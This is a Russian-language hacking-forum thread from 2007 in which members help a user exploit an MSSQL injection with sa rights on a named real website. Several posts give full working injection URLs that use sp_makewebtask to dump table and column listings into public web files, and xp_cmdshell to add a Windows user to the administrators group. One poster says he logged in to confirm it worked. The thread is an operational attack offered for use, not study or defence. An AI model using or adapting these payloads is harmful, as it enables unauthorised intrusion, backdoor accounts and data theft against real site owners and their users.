mssql inj вопрос для гуру

Discussion in 'Песочница' started by $jason$, 24 Jul 2007.

Thread Status:
Not open for further replies.
  1. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    Здравствуйте помогите понять почему неработают некоторые фишки mssql
    для примера взял инъекцию на сайте пидоров :)
    тут sql-inj с правами sa
    Syntax error converting the nvarchar value 'sa' to a column of data type int.

    хочу добавить юзера через xp_cmdshell

    выдаёт Incorrect syntax near 'net'.
    что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера :( коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный

    пробую зделать дамп таблиц через sp_makewebtask

    тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом

    Incorrect syntax near the keyword 'order'.

    тут что я нетак делаю?

    путьдо веб директории в ошибке взял
    Error Executing Database Query.
    [Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'.

    The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qry_get_article_id.cfm: line 17
    Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\current.cfm: line 1
    Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qry_get_article_id.cfm: line 17
    Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\current.cfm: line 1

    P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa
     
    1 person likes this.
  2. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Тебе ошибка в явном виде вываливается, надо лишь немного подумать (заглушить ордер):

    Code:
    http://cybersocket.com/current/current.cfm?issue_id=1;+EXEC+master..sp_makewebtask+%22C:\Inetpub\wwwroot\www.cybersocket.com\includes\output.html%22,%22SELECT+*+FROM+INFORMATION_SCHEMA.TABLES%22;+select+c.id,c.category+from+tbl_issue_category+ic,tbl_category+c,tbl_article+a+where+ic.category=a.category+and+ic.issue=a.issue+and+ic.category=c.id+and+ic.issue=1
    Здесь все таблицы
    http://cybersocket.com/includes/output.html

    а здесь можешь посмотреть все колонки
    http://cybersocket.com/includes/output5.html

    ЗЫ
    Юзверя создавать не буду, надеюсь сам дальше разберешься, а то совсем непохек получится =\
    ЗЗЫ
    Ток там при добалении юзверя не забудь вместо ' поставить "(%22)
     
    #2 [53x]Shadow, 25 Jul 2007
    Last edited: 25 Jul 2007
  3. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    спасибо большое,как бы с тобой пообщаться в icq ? время много неотнему и глупыми вопросами доставать небуду...напиши в пм свою асю плз
     
  4. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    с юзером пробовал и так как ты написал(до создания тут темы ещё),неработает почему-то...может у меня руки неоттуда ростут) ну нетолько с этой багой такие проблемы
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ну тебе же сказали надо order by нетрализовать

    Code:
    http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20user%20test1%20hacker%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a
    Code:
    http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20localgroup%20administrators%20test1%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a
    зы пробовал приконнектится... все работает :)
     
  6. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    да всё ок!
    чёто я тупанул немного,спасибо
     
  7. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    нашёл ещё одну inj с правами sa там там возникает такая ошибка при подстановке -1'
    site.com/index.asp?id=1;exec%20master..xp_cmdshell%20%20%22net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22--

    site.com/index.asp?id=1';exec%20master..xp_cmdshell%20%20%22net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22--

    пытаюсь сам думать но недогоняю) подскажите плз
    как я понял тут в одной переменной скрипта id передаются два запроса к базе и нужно правильно вставить свой запрос и второй запрос закрыть (может конечно я глупость сказал )
    так ещё пробовал

    site.com/bug.asp?ID=1';exec%20master..xp_cmdshell%20%20net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add%22;1';--

    непонял ещё
    что тут тип нужно чтоли указывать...подскажите тогда как это зделать?
     
    1 person likes this.
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    здесь: site.com/index.asp?id=1;exec.... после 1 попробуй поставь поставь ковычку

    вот так попробуй:
    Code:
    site.com/index.asp?id=1';exec%20master..xp_cmdshell%20' net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add
     
    #8 Scipio, 25 Jul 2007
    Last edited: 25 Jul 2007
  9. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Вообще тему имхо пора закрывать, для скулей есть отдельная тема, туда и выкладывай, там тебе быстро помогут. А вообще больше становится похожим на просьбы о взломе =\
     
    1 person likes this.
  10. $jason$

    $jason$ New Member

    Joined:
    12 Apr 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    где отдельная тема по скулям дай линк
    я не прошу чтоб мне кто-то что-то взламывал, я хочу сам понять почему у меня неполучается составить правильный запрос к базе прежде чем что-то спрашивать я сам пробую по всякому и инфу везде где только можно ищу по теме и потом только спрашиваю у вас
     
  11. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    https://forum.antichat.ru/thread21336.html
     
    1 person likes this.
  12. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    Млин, ну не просьбы здесь.Здесь отписываем уязвимости =\
     
    4 people like this.
Loading...
Thread Status:
Not open for further replies.